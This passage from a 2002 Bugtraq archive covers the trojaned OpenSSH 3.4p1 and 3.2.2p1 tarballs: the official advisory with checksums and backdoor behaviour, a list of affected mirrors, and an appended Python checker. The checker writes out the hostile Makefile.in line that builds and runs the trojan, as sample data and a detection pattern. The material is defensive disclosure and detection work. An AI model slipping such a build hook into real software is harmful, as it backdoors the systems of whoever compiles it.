I have also been curious as to how exactly DJM and the portability group have been verifying that _they_ obtained clean tarballs before applying their modifications. If they also have no way to verify tarballs, that effectively blinds a very important set of eyes from being able to spot trojans.

(Of course, if they are just doing CVS checkouts from a secure CVS server, this issue would be moot. But the fact that the portable versions were also trojaned, combined with the appearance that the trojaning occurred _on the FTP server and not on any development machines_, I think allows one to reasonably assume that the tarballs are being used. This last point may not be the case, we will have to wait for more information to come out.)

(8802039) /Jim Breton <jamesb-bugtraq@alongtheway.com>/(Rewrapped)

8800840 2002-08-01 11:18 -0400 /54 lines/ Niels Provos <provos@citi.umich.edu>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 18:35 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23433>
Subject: OpenSSH Security Advisory: Trojaned Distribution Files
------------------------------------------------------------
From: Niels Provos <provos@citi.umich.edu>
To: bugtraq@securityfocus.com
Message-ID: <20020801151812.GE6925@citi.citi.umich.edu>

OpenSSH Security Advisory (adv.trojan)

1. Systems affected:

    OpenSSH version 3.2.2p1, 3.4p1 and 3.4 have been trojaned on the OpenBSD ftp server and potentially propagated via the normal mirroring process to other ftp servers. The code was inserted some time between the 30th and 31st of July. We replaced the trojaned files with their originals at 7AM MDT, August 1st.

2. Impact:

    Anyone who has installed OpenSSH from the OpenBSD ftp server or any mirror within that time frame should consider his system compromised. The trojan allows the attacker to gain control of the system as the user compiling the binary. Arbitrary commands can be executed.

3. Solution:

    Verify that you did not build a trojaned version of the sources. The portable SSH tarballs contain PGP signatures that should be verified before installation. You can also use the following MD5 checksums for verification.

    MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8
    MD5 (openssh-3.4p1.tar.gz.sig) = d5a956263287e7fd261528bb1962f24c
    MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2
    MD5 (openssh-3.2.2p1.tar.gz) = 9d3e1e31e8d6cdbfa3036cb183aa4a01
    MD5 (openssh-3.2.2p1.tar.gz.sig) = be4f9ed8da1735efd770dc8fa2bb808a

4. Details

    When building the OpenSSH binaries, the trojan resides in bf-test.c and causes code to execute which connects to a specified IP address. The destination port is normally used by the IRC protocol. A connection attempt is made once an hour. If the connection is successful, arbitrary commands may be executed. Three commands are understood by the backdoor:

    Command A: Kill the exploit.
    Command D: Execute a command.
    Command M: Go to sleep.

5. Notice:

    Because of the urgency of this issue, the advisory may not be complete. Updates will be posted to the OpenSSH web pages if necessary.
(8800840) /Niels Provos <provos@citi.umich.edu>/----
Attachment (application/pgp-signature) in text 8800841

8800841 2002-08-01 11:18 -0400 /13 lines/ Niels Provos <provos@citi.umich.edu>
Imported: 2002-08-01 18:35 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23434>
Attachment (text/plain) to text 8800840
Subject: Attachment to: OpenSSH Security Advisory: Trojaned Distribution Files
------------------------------------------------------------
(8800841) /Niels Provos <provos@citi.umich.edu>/----

8801656 2002-08-01 19:56 +0300 /96 lines/ Tomi Nylund <wizard@university.in.oulu.fi.invalid>
Sent by: joel@lysator.liu.se
Imported: 2002-08-01 22:19 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <23446>
Subject: List of mirrors carrying trojaned OpenSSH
------------------------------------------------------------
From: Tomi Nylund <wizard@university.in.oulu.fi.invalid>
To: bugtraq@securityfocus.com
Message-ID: <3D496836.5C8D56D1@university.in.oulu.fi.invalid>

Hello, my first post to the list. Cool.. :)

Sorry for the horrible formatting: this was posted in haste using Netscape's Mail client :(

Anyways, we did some research here at Oulu regarding the propagation of the trojaned OpenSSH-3.4p1.tar.gz, and found out the following:

Trojaned mirrors:

MD5 (./ftp.club-internet.fr/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.easynet.be/openssh/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.freenet.de/pub/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.fsn.hu/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.inet.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.isu.net.sa/pub/mirrors/ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.jaquet.dk/pub/openSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.openbsd.cz/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.openbsd.org.br/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.openbsd.ru/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.sajinet.com.pe/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.stealth.net/pub/mirrors/ftp.openssh.com/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.tku.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.uninett.no/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp.volftp.mondadori.com/mirror/openbsd/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./ftp7.usa.openbsd.org/pub/os/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./hal.csd.auth.gr/mirrors/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./openbsd.csie.nctu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./openbsd.nsysu.edu.tw/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57
MD5 (./openbsd.rug.ac.be/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57

The list was taken from http://www.openssh.com/portable.html, it does NOT contain all the mirrors out there, just the primary ones, I guess.. The list was taken around 1700 hours EEST.

Also, it should be apparent that NOTHING from ftp.openbsd.org should be trusted until their sysadmins have done full damage assessment.

Also, some people have debated on the severity of opening a shell to some remote location. Please note that any commands may be run over such a connection, perhaps patching the OpenSSH source code a bit further, or dropping a platform-specific rootkit to the victim's system: the author had gone to great lengths to make the code as portable as possible.

My e-mail address is obfuscated to repel spammers, however, if you wish to contact me or any other members of our group, you'll find our contact details from our web pages.

Regards,
Tomi

--------------Tomi Nylund, Research Scientist, OUSPG----------------
Group info & contact details at http://www.ee.oulu.fi/research/ouspg
PGP key: http://www.ee.oulu.fi/research/ouspg/ouspg-key.asc
Key fingerprint = B2 F7 97 09 F5 4C 29 97 9A A8 2D FB 59 CA 10 C4
-------------Oulu University Secure Programming Group---------------

(8801656) /Tomi Nylund <wizard@university.in.oulu.fi.invalid>/(Rewrapped)
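The checks the advisory and the OUSPG mirror survey above call for, as an added example that is not code from any of the posts or from the OpenSSH project: it classifies a downloaded tarball by its MD5 against the digests quoted in this thread, and scans an unpacked tree for the Makefile.in hook and the bf-test.c file that Edwin and Christian describe. All function names are mine, the sample tree it builds is constructed, and MD5 only identifies the specific files named in the thread, so the PGP signature check the advisory recommends still applies.

```python
"""Added example: verify an OpenSSH tarball against the digests published in
this thread and scan an unpacked source tree for the bf-test hook."""
import hashlib
import os
import re
import tempfile

# Known-good MD5 digests, as listed in the OpenSSH advisory (adv.trojan) above.
KNOWN_GOOD = {
    "459c1d0262e939d6432f193c7a4ba8a8": "openssh-3.4p1.tar.gz",
    "d5a956263287e7fd261528bb1962f24c": "openssh-3.4p1.tar.gz.sig",
    "39659226ff5b0d16d0290b21f67c46f2": "openssh-3.4.tgz",
    "9d3e1e31e8d6cdbfa3036cb183aa4a01": "openssh-3.2.2p1.tar.gz",
    "be4f9ed8da1735efd770dc8fa2bb808a": "openssh-3.2.2p1.tar.gz.sig",
}
# Digest of the trojaned openssh-3.4p1.tar.gz reported by Edwin Groothuis and
# seen on every mirror in the OUSPG survey.
KNOWN_TROJANED = {
    "3ac9bc346d736b4a51d676faa2a08a57": "openssh-3.4p1.tar.gz (trojaned)",
}

# The hook in the diff above hangs a bf-test build off the 'all:' target in
# openbsd-compat/Makefile.in; a clean 3.4p1 tree has no bf-test at all.
HOOK_RE = re.compile(r"bf-test")


def md5_file(path):
    """Hex MD5 of a file, read in chunks so a full tarball is fine."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def classify_digest(digest):
    """Return 'good', 'trojaned' or 'unknown' for a hex MD5 digest."""
    d = digest.strip().lower()
    if d in KNOWN_GOOD:
        return "good"
    if d in KNOWN_TROJANED:
        return "trojaned"
    return "unknown"


def classify_tarball(path):
    """Classify a downloaded tarball by its MD5 digest."""
    return classify_digest(md5_file(path))


def scan_tree(root):
    """Findings for an unpacked openssh source tree rooted at `root`: the
    dropped-in bf-test.c, and any Makefile/Makefile.in line that runs it."""
    findings = []
    compat = os.path.join(root, "openbsd-compat")
    if os.path.exists(os.path.join(compat, "bf-test.c")):
        findings.append("openbsd-compat/bf-test.c present (absent from a clean tree)")
    for name in ("Makefile.in", "Makefile"):
        path = os.path.join(compat, name)
        if not os.path.exists(path):
            continue
        with open(path, "r", errors="replace") as f:
            for lineno, line in enumerate(f, 1):
                if HOOK_RE.search(line):
                    findings.append("openbsd-compat/%s:%d: %s" % (name, lineno, line.strip()))
    return findings


def build_demo_tree():
    """Constructed sample (not a real unpack): a minimal tree carrying the
    exact Makefile.in line shown in the diff above and a stand-in bf-test.c."""
    root = tempfile.mkdtemp(prefix="openssh-demo-")
    compat = os.path.join(root, "openbsd-compat")
    os.makedirs(compat)
    with open(os.path.join(compat, "Makefile.in"), "w") as f:
        f.write("all: libopenbsd-compat.a\n"
                "\t@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &\n"
                "$(COMPAT): ../config.h\n")
    with open(os.path.join(compat, "bf-test.c"), "w") as f:
        f.write("/* stand-in for the dropped-in source; not the real file */\n")
    return root


if __name__ == "__main__":
    for digest in ("459c1d0262e939d6432f193c7a4ba8a8", "3ac9bc346d736b4a51d676faa2a08a57"):
        print(digest, "->", classify_digest(digest))
    for finding in scan_tree(build_demo_tree()):
        print("FINDING:", finding)
```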